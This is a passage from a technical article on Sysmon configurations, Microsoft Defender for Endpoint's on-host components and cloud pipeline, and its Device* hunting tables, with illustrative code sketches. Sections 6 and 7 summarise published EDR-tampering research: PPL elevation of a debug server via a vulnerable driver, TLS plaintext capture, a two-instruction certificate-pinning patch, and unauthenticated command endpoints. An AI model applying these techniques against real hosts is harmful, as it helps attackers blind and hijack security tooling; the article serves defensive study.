The legacy URL `https://github.com/Neo23x0/sysmon-config` now HTTP-301 redirects to `https://github.com/NextronSystems/sysmon-config`. The GitHub REST API for the current repository returns `created_at: 2021-07-24T06:19:41Z` with `parent: SwiftOnSecurity/sysmon-config`, which means the repository as it now exists was created in mid-2021 when Florian Roth moved it from his personal handle to his employer's organization namespace [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; the move is an organizational one. The exact pre-rename creation date of the original `Neo23x0/sysmon-config` repository is not reliably retrievable from the current API and is best dated as January 2018 based on the README and the fork-history.

olafhartong/sysmon-modular (January 13, 2018)

Olaf Hartong's sysmon-modular was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository's design takes a different shape from the monolithic SwiftOnSecurity and NextronSystems configs: instead of one carefully-tuned XML, Hartong publishes a per-EID-per-technique module library that compiles into one of five pre-generated artifacts plus an arbitrary number of custom builds [@github-hartong-modular]. The pre-generated variants are:

sysmonconfig.xml -- the default deployment baseline.
sysmonconfig-with-filedelete.xml -- default plus the EID 23 archive variant of file delete, which preserves the deleted file in C:\Sysmon\ (a volume-cost trade-off; a dedicated drive is advisable).
sysmonconfig-excludes-only.xml -- the verbose variant, which captures everything except a small set of well-known exclusions; useful for detection-engineering R&D on a single host.
sysmonconfig-research.xml -- the super-verbose variant, with the README's standing warning: "really DO NOT USE IN PRODUCTION!" -- this is for live-malware-sample analysis in a sandbox, not for fleet rollout.
sysmonconfig-mde-augment.xml -- the variant whose entire design intent is to augment Microsoft Defender for Endpoint's collection surface "to have as little overlap as possible" with what MDE already captures [@github-hartong-modular].

The MDE-augment config is the artifact this article keeps returning to. It is the operational answer -- maintained by a person, not by Microsoft -- to the question of which Sysmon events are worth collecting on a host that already has MDE installed. We will return to its specific contents in §10. For now, the key observation is that this config exists because of a documented absence: Microsoft has not published a per-ActionType cross-walk between MDE's Device* schema and Sysmon's manifest, so Hartong reverse-engineered one.

Side-by-side comparison

Dimension	SwiftOnSecurity/sysmon-config	NextronSystems/sysmon-config (formerly Neo23x0)	olafhartong/sysmon-modular
Author / org	SwiftOnSecurity (pseudonymous)	Florian Roth + Nextron Systems team	Olaf Hartong (and FalconForce collaborators)
Created	Feb 1, 2017	Forked Jan 2018; renamed Jul 24, 2021	Jan 13, 2018
Distribution	One monolithic XML	Two XMLs (audit + blocking)	Modular per-technique + five pre-generated builds
Design philosophy	Quality starting point, conservative	Community-maintained, blocking-aware	Tunable modular, MITRE ATT&CK-mapped
Best used for	First-time Sysmon deployment	Standalone Sysmon at scale	Sysmon alongside MDE, or per-team customization
Pre-generated v14+ blocking	No (audit only)	Yes (`sysmonconfig-export-block.xml`)	Yes (built from blocking modules)
MDE coexistence variant	No	No	Yes (`sysmonconfig-mde-augment.xml`)

Choosing among the three

The detection-engineering trade-off framing is short. Pick SwiftOnSecurity when you want a clean, well-commented starting point and you are not yet sure which events you actually need. Pick NextronSystems when you want a community-maintained baseline that already has the blocking rules for Sysmon v14+. Pick Hartong when you want fine-grained per-technique tunability or, more commonly, when you are running MDE and need Sysmon to augment rather than duplicate it.

Tactical caution worth one inline note: Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Hartong's modular approach generates a single merged XML at build time; the production fleet receives that single XML and the driver enforces it. If you are trying to run two configurations side by side -- one for the SOC's hunting, one for the platform team's audit -- pick one, merge the rules, and ship the combined product. The deployment tooling in sysmon-modular is built around exactly this constraint.
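Merging has a consequence worth seeing concretely: because an exclude match overrides an include match, one team's noise exclusion can silently cancel another team's include. The C sketch below reduces each team's config for one event type to lists of image-path suffixes. `SuffixConfig`, `merge_configs`, and `merged_logs` are hypothetical, matching is case-sensitive for brevity, and real Sysmon configs carry many more fields and conditions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define MAX_RULES 16

/* Hypothetical per-event-type config: include and exclude suffix lists. */
typedef struct {
    const char *include[MAX_RULES]; size_t n_include;
    const char *exclude[MAX_RULES]; size_t n_exclude;
} SuffixConfig;

static bool ends_with(const char *s, const char *suffix) {
    size_t ls = strlen(s), lx = strlen(suffix);
    return ls >= lx && strcmp(s + ls - lx, suffix) == 0;
}

/* Append `rule` unless already present; false if the list is full. */
static bool append_unique(const char **list, size_t *n, const char *rule) {
    for (size_t i = 0; i < *n; i++)
        if (strcmp(list[i], rule) == 0) return true;
    if (*n == MAX_RULES) return false;
    list[(*n)++] = rule;
    return true;
}

/* Union both configs into `out`; false if either list would overflow. */
bool merge_configs(const SuffixConfig *a, const SuffixConfig *b, SuffixConfig *out) {
    const SuffixConfig *parts[2] = {a, b};
    memset(out, 0, sizeof *out);
    for (int p = 0; p < 2; p++) {
        for (size_t i = 0; i < parts[p]->n_include; i++)
            if (!append_unique(out->include, &out->n_include, parts[p]->include[i]))
                return false;
        for (size_t i = 0; i < parts[p]->n_exclude; i++)
            if (!append_unique(out->exclude, &out->n_exclude, parts[p]->exclude[i]))
                return false;
    }
    return true;
}

/* Exclude wins: an excluded image is never logged, even if included. */
bool merged_logs(const SuffixConfig *c, const char *image) {
    for (size_t i = 0; i < c->n_exclude; i++)
        if (ends_with(image, c->exclude[i])) return false;
    for (size_t i = 0; i < c->n_include; i++)
        if (ends_with(image, c->include[i])) return true;
    return false;
}
```

For example, if the SOC's config includes `\powershell.exe` and the platform team's config excludes it as noise, the merged config stops logging PowerShell entirely, so the merged product has to be reviewed as one rule set rather than as the union of two intentions.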

All three configurations assume the same thing: either Sysmon is the only EDR on the host (a deployment posture that exists in air-gapped, regulatory-no-cloud, or unlicensed environments) or it is augmenting an EDR whose collection surface is known. The augment case is the one where the field has converged on Hartong. To understand why, we have to look at what the other EDR -- Microsoft's own -- actually collects on the host.

6. Microsoft Defender for Endpoint: The Documented On-Host Surface

Two questions about MDE have very different answers. "What does Microsoft Defender for Endpoint run on this host?" has a primary-source-quality answer from Microsoft Learn. "What does it actually do?" has only a community-observed answer. The documented surface is the user-mode component inventory plus registry hives and event sources. The community-observed surface includes the kernel-callback inventory, the cloud TLS-pinning details, and the inter-process communication paths -- none of which Microsoft has published. Naming both halves with the right citations on each side is one of the few things this article does that other writeups skip.

The documented surface (Microsoft Learn, primary)

On every onboarded Windows endpoint, Microsoft Defender for Endpoint installs and runs a Windows service named Sense, whose display name is "Microsoft Defender for Endpoint Service" and whose backing executable is MsSense.exe. The on-host troubleshooting page documents the canonical health-check command: sc query sense [@sense-troubleshoot]. On Windows Server 2019, Server 2022, Server 2025, and Azure Stack HCI 23H2 or later, MDE is delivered as a Feature on Demand with the capability name Microsoft.Windows.Sense.Client~~~~. Microsoft documents the verification command verbatim: "DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~" [@sense-troubleshoot][@ms-server-endpoints-learn].
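Fleet health scripts usually capture the `sc query sense` output and reduce it to a single verdict. The sketch below does that reduction. The sample text is an assumed, typical layout of `sc query` output rather than something quoted from Microsoft Learn; on a real host, feed in the command's actual stdout.

```javascript
// Sketch: interpret captured `sc query sense` text. The sample below is an
// assumed typical layout of that output, not text from Microsoft Learn.

function parseScQueryState(output) {
  // sc prints a line such as "STATE              : 4  RUNNING"
  const match = /^\s*STATE\s*:\s*(\d+)\s+([A-Z_]+)/m.exec(output);
  if (!match) return null; // no STATE line: service missing or query failed
  return { code: Number(match[1]), name: match[2] };
}

function isSenseRunning(output) {
  const state = parseScQueryState(output);
  return state !== null && state.name === "RUNNING";
}

const sample = [
  "SERVICE_NAME: sense",
  "        TYPE               : 10  WIN32_OWN_PROCESS",
  "        STATE              : 4  RUNNING",
  "                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)",
  "        WIN32_EXIT_CODE    : 0  (0x0)",
].join("\n");

console.log(parseScQueryState(sample)); // { code: 4, name: 'RUNNING' }
console.log(isSenseRunning("[SC] EnumQueryServicesStatus:OpenService FAILED 1060:")); // false
```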

Onboarding state is recorded under two registry hives that Microsoft Learn names explicitly:

HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection -- the policy-driven configuration surface.
HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status -- the run-time onboarding state.

Onboarding diagnostics land in the WDATPOnboarding event source under the Application event log, with documented event IDs 5, 10, 15, 30, 35, 40, 65, and 70, each of which corresponds to a specific failure mode with a specific resolution procedure [@sense-troubleshoot]. The product installs to C:\Program Files\Windows Defender Advanced Threat Protection\ (the legacy path is preserved even after the September 2020 rebrand).
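Because each documented event ID maps to its own resolution procedure, the useful triage step is to filter on the source and the documented ID set, then count per ID. A minimal sketch, assuming a hypothetical export shape `{ source, id, time }` for Application-log records; the source name and the ID list are the ones given above, and the sketch deliberately does not guess what each ID means.

```javascript
// Sketch: select onboarding-failure records from an exported Application log.
// The record shape { source, id, time } is a hypothetical export format; the
// source name and ID set are the ones the troubleshooting page documents.

const ONBOARDING_SOURCE = "WDATPOnboarding";
const DOCUMENTED_ONBOARDING_IDS = new Set([5, 10, 15, 30, 35, 40, 65, 70]);

function onboardingFailures(records) {
  return records.filter(
    (r) => r.source === ONBOARDING_SOURCE && DOCUMENTED_ONBOARDING_IDS.has(r.id)
  );
}

// Count occurrences per documented ID; each ID has its own resolution procedure.
function countById(records) {
  const counts = {};
  for (const r of onboardingFailures(records)) counts[r.id] = (counts[r.id] || 0) + 1;
  return counts;
}

const exported = [
  { source: "WDATPOnboarding", id: 30, time: "2026-06-01T08:00:00Z" },
  { source: "WDATPOnboarding", id: 30, time: "2026-06-01T08:05:00Z" },
  { source: "WDATPOnboarding", id: 20, time: "2026-06-01T08:06:00Z" }, // not in the list above
  { source: "Application Error", id: 1000, time: "2026-06-01T08:07:00Z" },
];

console.log(countById(exported)); // { '30': 2 }
```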

The documented surface stops here. Microsoft Learn names MsSense.exe, the Sense service, the registry hives, the event source, the Feature on Demand, and the four operating systems. Microsoft Learn does not publish a kernel-callback inventory for the MDE EDR sensor.

The community-observed surface

Past the documented boundary, field-published primary sources cover two things: the user-mode binary inventory and the cloud-side TLS path. Three companion binaries sit alongside MsSense.exe:

SenseCncProxy.exe is the cloud-command-and-control proxy. This is the binary that holds the TLS connection out to Defender XDR ingest, applies the certificate-pinning policy, and shuttles agent-bound commands (live-response actions, custom-detection-rule pushes, sensor-configuration updates) back down to MsSense.exe.
SenseIR.exe is the live-response and investigation actions binary. When a SOC analyst clicks Run script or Collect investigation package in the Defender XDR portal, SenseIR.exe is the process that fulfils the request on the endpoint side.
SenseNdr.exe is the network detection and response component, responsible for endpoint-side enrichment of network observations used in the DeviceNetworkEvents table.

These binaries are not enumerated on Microsoft Learn in the same way the Sense service itself is. They are documented in MDE incident-response runbooks, in third-party reverse-engineering posts, and in the file-system signature data on any onboarded endpoint. The article treats their existence as community-observed. SenseIR.exe is corroborated by InfoGuard 2025's reverse-engineering of MDE's live-response cloud path [@infoguard-2025]; SenseNdr.exe in particular lacks an explicit community primary writeup as of 2026 -- its role here is inferred from its on-disk binary metadata and the file-system signature data on onboarded endpoints.

The kernel-side surface MDE shares with Defender Antivirus is documented in the Defender Antivirus product line [@ms-defender-av-arch]:

WdBoot.sys is the Early-Launch Antimalware (ELAM) driver. It loads ahead of the other boot-start drivers and classifies each of them, and the kernel uses that classification to decide which of them may load. It is signed with the Antimalware Extended Key Usage, 1.3.6.1.4.1.311.61.4.1 [@ms-learn-elam-sample].
WdFilter.sys is the Defender Antivirus file-system minifilter. It sits alongside SysmonDrv.sys at a different Filter Manager altitude.
WdNisDrv.sys is the Network Inspection System driver, which provides the host-firewall-augmenting NIS layer.

Protected Process Light (PPL): A Windows process-protection level, introduced in Vista (as Protected Process, for DRM) and extended in Windows 8.1 (for antimalware), that prevents user-mode debugger attach, code injection, and `OpenProcess` for write from any caller that does not itself run at an equal or higher PPL signer level. Antimalware-PPL (`PROTECTED_ANTIMALWARE_LIGHT`) is the level reserved for security products signed with the Antimalware EKU; `MsSense.exe` and Sysmon v15+ both run at this level.

Early-Launch Antimalware (ELAM): The Windows boot-order privilege that lets a driver signed with the Antimalware EKU `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample] load before any non-ELAM driver and classify subsequent boot-start drivers as `Good`, `Bad`, or `Unknown` so the kernel can decide which to load. The ELAM driver *itself* is measured (along with the bootloader, kernel, and other early-boot artefacts) into TPM PCRs by Windows's *Measured Boot*, which is a separate boot-integrity feature; ELAM's job is to classify, not to measure. Defender Antivirus's `WdBoot.sys` is the canonical ELAM driver. Sysmon's `SysmonDrv.sys` is *not* ELAM-signed; this is the pre-driver-load horizon discussed in §12.

Antimalware EKU: The Authenticode Extended Key Usage `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample], issued by Microsoft to security vendors after a code-signing and behavioral review. The EKU gates two distinct things: ELAM signing eligibility (so the driver loads first) and Antimalware-PPL eligibility for the user-mode service (so the service is harder to tamper with). MDE's `MsSense.exe`, Defender Antivirus's `MsMpEng.exe`, and Sysmon v15+ all carry this signature path.
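The classify-then-decide split in the ELAM definition can be modelled in a few lines. This is a simplified sketch: the Good/Bad/Unknown labels come from the definition above, while the hash sets, driver records, and the allow-list policy are hypothetical. In Windows the ELAM driver only returns a classification; the kernel applies a configurable policy that can also take boot-critical status into account, which this sketch ignores.

```javascript
// Simplified model of ELAM-style gating. Labels from the text; hash sets,
// driver records, and the policy set are hypothetical. The real kernel policy
// is configurable and can also weigh boot-critical status (ignored here).

const Classification = Object.freeze({ GOOD: "Good", BAD: "Bad", UNKNOWN: "Unknown" });

// Stand-in for the vendor signature data an ELAM driver ships with.
function classify(driver, knownGood, knownBad) {
  if (knownBad.has(driver.hash)) return Classification.BAD;
  if (knownGood.has(driver.hash)) return Classification.GOOD;
  return Classification.UNKNOWN;
}

// Hypothetical kernel-side policy: which classifications may load.
const allowedToLoad = new Set([Classification.GOOD, Classification.UNKNOWN]);

function bootDecisions(drivers, knownGood, knownBad) {
  return drivers.map((d) => {
    const classification = classify(d, knownGood, knownBad); // ELAM's job
    return { name: d.name, classification, load: allowedToLoad.has(classification) }; // kernel's job
  });
}

const knownGood = new Set(["h-good"]);
const knownBad = new Set(["h-bad"]);
const drivers = [
  { name: "storage.sys", hash: "h-good" },
  { name: "rootkit.sys", hash: "h-bad" },
  { name: "newvendor.sys", hash: "h-new" },
];

for (const d of bootDecisions(drivers, knownGood, knownBad)) {
  console.log(`${d.name}: ${d.classification}, load=${d.load}`);
}
```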

Antimalware-PPL on MsSense.exe

The MsSense.exe service runs as Antimalware-PPL -- PROTECTED_ANTIMALWARE_LIGHT in the kernel data structure. The protection level prevents an attacker with SYSTEM privileges from attaching a user-mode debugger, suspending the service, or injecting code into its address space using ordinary Windows debugging or code-injection APIs. This is the same protection level Sysmon v15+ runs at, and it is the same level Defender Antivirus's MsMpEng.exe has run at since Windows 8.1. The structural defense closes user-mode tampering as a class. The residual attack surface is kernel-mode primitives -- which is what FalconForce had to use in 2022 to debug MDE [@falconforce-2022].
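The protection level is a single byte in each process object (`_EPROCESS.Protection`, the field the FalconForce technique later patches): type in bits 0-2, an audit bit at bit 3, signer in bits 4-7. The sketch encodes that byte using the enum values published in Windows-internals literature and community tooling; treat them as reference values, not a supported API. Its access check is deliberately simplified to the "equal or higher signer" rule stated above; the real kernel consults a signer-dominance table rather than comparing numbers.

```javascript
// Sketch of the one-byte protection value: Type (bits 0-2), Audit (bit 3),
// Signer (bits 4-7). Enum values as published in Windows-internals material.

const ProtectedType = { None: 0, ProtectedLight: 1, Protected: 2 };
const ProtectedSigner = {
  None: 0, Authenticode: 1, CodeGen: 2, Antimalware: 3,
  Lsa: 4, Windows: 5, WinTcb: 6, WinSystem: 7, App: 8,
};

function encodeProtection(type, signer, audit = 0) {
  return (signer << 4) | (audit << 3) | type;
}

function decodeProtection(level) {
  return { type: level & 0x7, audit: (level >> 3) & 0x1, signer: (level >> 4) & 0xf };
}

// Deliberately simplified: numeric comparison instead of the kernel's
// signer-dominance table.
function mayOpenForWrite(callerLevel, targetLevel) {
  const c = decodeProtection(callerLevel);
  const t = decodeProtection(targetLevel);
  if (t.type === ProtectedType.None) return true; // unprotected target
  return c.type >= t.type && c.signer >= t.signer;
}

const antimalwarePPL = encodeProtection(ProtectedType.ProtectedLight, ProtectedSigner.Antimalware);
const winTcbPPL = encodeProtection(ProtectedType.ProtectedLight, ProtectedSigner.WinTcb);

console.log(antimalwarePPL.toString(16)); // 31
console.log(mayOpenForWrite(0, antimalwarePPL)); // false: SYSTEM process without PPL
console.log(mayOpenForWrite(winTcbPPL, antimalwarePPL)); // true: WinTcb-PPL debug server
```

The last line is the shape of the 2022 bypass: SYSTEM alone does not clear the check, but a process whose own protection byte has been raised above the target's does.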

The dispositive reverse-engineering primary: FalconForce 2022

Olaf Hartong and Henri Hambartsumyan, working at FalconForce, published the most-cited reverse-engineering writeup of MDE's on-host architecture in 2022. The post's TL;DR captures both the debug-bypass technique and the cloud vulnerability that resulted from applying it:

You can debug MDE running on an endpoint by running `dbgsrv.exe` and raising its PPL protection to WinTcb. This can be used to snoop on data being transmitted by MDE to the cloud. We identified a vulnerability related to missing authorization checks of data sent from the MDE endpoint to the M365 cloud, allowing anyone to send spoofed data to any M365 tenant.

The technique is precise [@falconforce-2022]. FalconForce raised the PPL signer level of the Debugging Tools for Windows process server (dbgsrv.exe) to WinTcb -- a signer level higher than Antimalware-PPL -- and used the elevated debug server to attach to MsSense.exe. From inside that debug session they instrumented SspiCli!EncryptMessage, the SSPI function that encrypts each outbound message on MDE's TLS connection, and captured the payloads from its input buffers while they were still plaintext. The plaintext capture surfaced CVE-2022-23278: a missing-authorization vulnerability in which the M365 cloud trusted whatever device-identifying claims the endpoint asserted, with no cross-check that the asserting endpoint owned the device identity it claimed [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. Microsoft patched the vulnerability on March 8, 2022, with a public acknowledgement to FalconForce: "Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure" [@msrc-cve-2022-23278].

Note: The kernel-and-Defender-Antivirus surface MDE shares (WdBoot.sys ELAM, WdFilter.sys minifilter, WdNisDrv.sys NIS) is documented. The specific callback inventory the MDE EDR sensor itself registers is not. The community's best-published primary for what MsSense.exe actually does is the FalconForce 2022 reverse-engineering writeup -- and it covers a narrow slice (TLS interception and one cloud-authorization bug), not a full callback list. The Hartong sysmonconfig-mde-augment.xml config exists as a community-curated artifact precisely because Microsoft has not published a per-ActionType-to-per-kernel-callback cross-walk. The most-cited operational config in the field is downstream of a documentation gap. This is the second aha moment of the article.

Putting the on-host pieces together

flowchart TD
    B["WdBoot.sys (ELAM, Antimalware EKU)"] -.boot order.-> F["WdFilter.sys (file minifilter)"]
    B -.boot order.-> N["WdNisDrv.sys (Network Inspection)"]
    F --> M["MsSense.exe (Antimalware-PPL aggregator)"]
    N --> M
    M --> IR["SenseIR.exe (Live Response)"]
    M --> NDR["SenseNdr.exe (Network Detection)"]
    M --> P["SenseCncProxy.exe (cloud forwarder)"]
    P -- "TLS + certificate pinning" --> C["Defender XDR ingest (regional Kusto)"]

The picture is asymmetric: the kernel-driver substrate at the top is documented in the Defender Antivirus product line; the user-mode service inventory in the middle is documented for MsSense.exe and partly documented for the companion binaries; the cloud transport at the bottom is documented at the API-contract level (TLS, certificate pinning), but the specific endpoints and the on-the-wire payload format are reverse-engineered. The community-published primaries -- FalconForce 2022 from the plaintext side of the TLS layer, InfoGuard Labs 2025 from the wire side -- are how the field knows what it knows about the cloud-bound payload. That payload is the next layer.

7. The Cloud Pipeline: SenseCncProxy.exe to Defender XDR Ingest

The wire between MsSense.exe and Microsoft's cloud is TLS with certificate pinning. It is also, twice in the last four years, the place where the most interesting Defender for Endpoint vulnerabilities have lived. The 2022 round closed one of them. The 2025 round is still open as of this article's writing.

Certificate pinning and the FalconForce 2022 method

MsSense.exe does not trust whatever the Windows certificate store says about the chain to Defender XDR ingest. It pins the certificate. FalconForce's bypass is the one §6 already named: raise dbgsrv.exe to WinTcb PPL, attach the elevated debug server to MsSense.exe, and instrument SspiCli!EncryptMessage to capture the plaintext payload before TLS encryption [@falconforce-2022].

The specific PPL elevation technique is published in the same writeup. PPLKiller's /enablePPL patch writes a Protected Process Light value with the WinTcb signer level into dbgsrv.exe's _EPROCESS.Protection field. The result: a debug server running at a PPL signer level above Antimalware-PPL, with OpenProcess rights against any Antimalware-PPL target [@falconforce-2022]. This requires SYSTEM plus a kernel primitive, typically delivered via BYOVD (bring your own vulnerable driver).

The InfoGuard Labs 2025 follow-up took a different route to the same problem. Instead of reading plaintext before TLS encryption, InfoGuard patches the certificate-chain validation function in memory so the cloud endpoint's certificate chain is no longer checked at all, and any local TLS-stripping proxy can then intercept the wire. The verbatim patch is two CPU instructions written into CRYPT32!CertVerifyCertificateChainPolicy: "mov eax, 1; ret" -- which forces the function to return success without performing any actual chain check [@infoguard-2025].
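Why two instructions are enough is easiest to see in a toy model. The sketch mimics the shape of CertVerifyCertificateChainPolicy, a BOOL return that reports whether the policy check ran plus a status structure whose dwError field carries the verdict, but it is not the Win32 API. The thumbprint comparison, the error constant, and the caller zero-initialising its status structure are assumptions made for illustration.

```javascript
// Toy model of why "mov eax, 1; ret" disables the pin. Mimics the SHAPE of
// CertVerifyCertificateChainPolicy (BOOL "check ran" + status.dwError verdict);
// thumbprints, the error constant, and zero-initialised status are assumptions.

const PIN_MISMATCH = 0x1; // hypothetical non-zero error code

function verifyChainPolicy(chain, status) {
  // Original behaviour: write the verdict into status.dwError, return TRUE.
  status.dwError = chain.leafThumbprint === chain.pinnedThumbprint ? 0 : PIN_MISMATCH;
  return 1;
}

function patchedVerifyChainPolicy(_chain, _status) {
  // "mov eax, 1; ret": report TRUE and never write the verdict.
  return 1;
}

function callerAcceptsChain(verify, chain) {
  const status = { dwError: 0 }; // assumed zero-initialised by the caller
  const ran = verify(chain, status);
  return ran === 1 && status.dwError === 0;
}

// A TLS-stripping proxy presents its own certificate, so the thumbprints differ.
const proxied = { leafThumbprint: "proxy-cert", pinnedThumbprint: "defender-ingest-cert" };
console.log(callerAcceptsChain(verifyChainPolicy, proxied)); // false
console.log(callerAcceptsChain(patchedVerifyChainPolicy, proxied)); // true
```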

With the pinning gate disabled, InfoGuard's team observed the on-the-wire protocol. The cloud-bound payload goes to two endpoint families: /edr/commands/cnc for command-and-control and /senseir/v1/actions/ for live-response actions. The vulnerability they then disclosed is that both endpoint families accept "data sent from the MDE endpoint to the cloud ... without validating authentication tokens, allowing a post-breach attacker with a machine's ID to hijack the command-and-control channel" [@infoguard-2025]. Microsoft's response, verbatim: "All findings were reported to the Microsoft Security Response Center (MSRC) in July 2025. However, Microsoft has classified them as low severity and has not committed to a fix" [@infoguard-2025].
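The bug class in both disclosures is the same shape: the server accepts an identity claim without checking that the caller's credential was issued to that identity. A toy model, in which the handler names, token strings, and token store are all hypothetical and make no claim about MDE's real protocol:

```javascript
// Toy model of the bug class: accept a request on a claimed machine ID alone,
// versus also checking that the presented token was issued to that machine.
// Names, tokens, and the store are hypothetical, not MDE's real protocol.

const issuedTokens = new Map([["tok-A", "machine-A"]]); // token -> machine it was issued to

function vulnerableHandler(request) {
  // Trusts the asserted identity; never looks at request.token.
  return { accepted: typeof request.machineId === "string", actingAs: request.machineId };
}

function fixedHandler(request) {
  const owner = issuedTokens.get(request.token);
  const accepted = owner !== undefined && owner === request.machineId;
  return { accepted, actingAs: accepted ? owner : null };
}

// An attacker who knows machine-A's ID but holds no valid token:
const spoofed = { machineId: "machine-A", token: "not-a-real-token" };
console.log(vulnerableHandler(spoofed).accepted); // true
console.log(fixedHandler(spoofed).accepted); // false
```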

FalconForce 2022 found a missing-authorization bug in the cloud's trust path, and CVE-2022-23278 was patched. InfoGuard Labs 2025 found a different missing-authorization pattern in different cloud endpoints -- different bug, same class -- and the disclosure record says Microsoft has not committed to a fix. The cloud extends enough trust to what an endpoint claims about itself that the same class of authorization gap keeps resurfacing. The arc that began with the March 2022 spoofing-CVE patch is not closed. This is the third aha moment of the article, surfaced again in §11.

What the cloud does on arrival

Once SenseCncProxy.exe has TLS-shipped the event over the wire to the regional Defender XDR ingest endpoint, two things happen on the cloud side. First, the event lands in the Advanced Hunting Kusto cluster. Microsoft Learn's verbatim freshness claim is: "Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services" [@advanced-hunting-overview]. "Almost immediately" is empirically a few seconds in steady state, which is exactly what Maya saw in §1: a row with Timestamp three seconds in the past.

Second, the event is replicated for use by Microsoft's built-in detection rules, MITRE-mapped queries, and the cross-domain correlation surface that joins endpoint events to email events, identity events, and cloud-application events. The cross-domain join is one of the most-cited reasons enterprises stay on the licensed product rather than fall back to standalone Sysmon: KQL can join DeviceProcessEvents to EmailEvents to IdentityLogonEvents in one query, and Sysmon-only deployments cannot do that without a separate SIEM doing the cross-source enrichment.

Data residency is documented at the regional level in the MDE configure-server-endpoints page: "data is stored in the US for customers in the USA; in EU for European customers; and in the UK for customers in the United Kingdom" [@ms-server-endpoints-learn]. Retention in-portal is the same quota for all geographies: "Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data" [@advanced-hunting-overview]. Past 30 days, the customer has to extend the retention surface via Microsoft Sentinel's per-table archiving, which is the operational story §9 picks up.

The event's journey, end to end

sequenceDiagram
    participant K as Kernel callback (e.g. WdFilter)
    participant S as MsSense.exe (Antimalware-PPL)
    participant P as SenseCncProxy.exe
    participant CP as CRYPT32!CertVerifyCertificateChainPolicy
    participant C as Defender XDR ingest (regional Kusto)
    participant Q as DeviceProcessEvents table
    K->>S: Synchronous callback notification
    Note over S: Enrich (parent PID, hashes, identity, ProcessGuid)
    S->>S: SspiCli!EncryptMessage (FalconForce 2022 plaintext capture point)
    S->>P: IPC to cloud forwarder
    P->>CP: Validate Defender XDR certificate chain
    CP-->>P: Pinned chain OK (InfoGuard 2025 bypass: patch CP to return 1 unconditionally)
    P->>C: HTTPS POST /edr/commands/cnc or /senseir/v1/actions/
    C->>Q: Write into Kusto cluster
    Note over Q: "Almost immediately" -- seconds end to end, then queryable via KQL

The diagram is annotated with the two community-disclosed interception points because they are the two places the field has actually been able to observe what is on the wire. Between SspiCli!EncryptMessage (where the plaintext payload exists) and CRYPT32!CertVerifyCertificateChainPolicy (where the certificate chain gets validated), the path is otherwise opaque to external researchers. The Microsoft-published side of the story is the contractual one: TLS, certificate pinning, regional ingest, Kusto cluster, KQL exposure. The reverse-engineered side fills in the rest.

Within seconds, the event appears as a row in DeviceProcessEvents. The reader-side schema is where the analyst lives. So: what columns?

8. Six `Device*` Tables and One Worked KQL Query

Every detection rule in Microsoft Defender XDR, every hunting query in Microsoft Sentinel, and every analyst pivot Maya does on her console is a KQL query against six load-bearing tables. Knowing those six tables is the price of admission to the Defender XDR field.

Kusto Query Language (KQL): Microsoft's data-explorer query language, originally built for Azure Data Explorer (formerly Kusto). KQL reads as a pipeline of operators -- `where`, `project`, `summarize`, `join`, `order by` -- left to right. Advanced Hunting in Microsoft Defender XDR and analytics queries in Microsoft Sentinel both expose the same KQL dialect; the same query text can be moved between the two surfaces with only the table-name namespace changing [@advanced-hunting-overview][@sentinel-xdr-connector].

The six tables

The six tables that this article calls "load-bearing" are the ones that map most cleanly to Sysmon's manifest and that detection rules join against most often:

DeviceProcessEvents -- the canonical reader-side analogue of Sysmon's EID 1 (ProcessCreate) and EID 5 (ProcessTerminate). The schema reference page names roughly fifty columns including Timestamp, DeviceId, DeviceName, ActionType, FileName, FolderPath, SHA1, SHA256, MD5, FileSize, ProcessId, ProcessCommandLine, ProcessIntegrityLevel, ProcessTokenElevation, ProcessCreationTime, AccountSid, AccountName, AccountUpn, LogonId, and the full InitiatingProcess* family of parent-process columns [@deviceprocessevents-table].
DeviceNetworkEvents -- the analogue of Sysmon EID 3 (NetworkConnect) plus EID 22 (DNSEvent) and the MDE-only network-protection telemetry. Columns include RemoteIP, RemotePort, RemoteUrl, LocalIP, LocalPort, Protocol, RemoteIPType, and the InitiatingProcess* family [@sentinel-xdr-connector].
DeviceFileEvents -- the analogue of Sysmon EIDs 11 (FileCreate), 15 (FileCreateStreamHash), 23 (FileDelete archived), and 26 (FileDeleteDetected).
DeviceImageLoadEvents -- the analogue of Sysmon EID 7 (ImageLoad).
DeviceRegistryEvents -- the analogue of Sysmon EIDs 12-14 (RegistryEvent family).
DeviceEvents -- the miscellaneous catch-all. AMSI scan results, exploit-protection events, ASR rule fires, Network Protection blocks, and other MDE-specific events that do not fit cleanly into any of the per-event-class tables surface here as ActionType discriminators.

Past the six core tables there are siblings the article does not walk in detail but that detection engineers query alongside: DeviceLogonEvents (interactive, remote-interactive, network logons), DeviceFileCertificateInfo (Authenticode signer information), DeviceInfo and DeviceNetworkInfo (asset and posture). The cross-domain tables that the Defender XDR portal exposes -- AlertInfo, AlertEvidence, IdentityLogonEvents, EmailEvents, CloudAppEvents -- are also queryable from the same surface, and the cross-domain join is one of the load-bearing reasons SOC teams move queries from a standalone SIEM into Advanced Hunting [@sentinel-xdr-connector].

Sysmon EID to MDE table cross-walk

The cross-walk is the table detection engineers actually need at their desk. Every row is a Sysmon EID, the MDE table the analogous event lands in, the ActionType discriminator inside that table, and a fidelity rating relative to Sysmon's manifest -- because the MDE schema does not surface every Sysmon field, and the fidelity gaps are where Hartong's MDE-augment config earns its keep.

Sysmon EID	MDE table	ActionType	Fidelity vs Sysmon	Hartong-augment disposition
1 ProcessCreate	DeviceProcessEvents	ProcessCreated	Full	Drop (MDE covers)
3 NetworkConnect	DeviceNetworkEvents	ConnectionSuccess	Full	Drop
7 ImageLoad	DeviceImageLoadEvents	ImageLoaded	Full	Drop
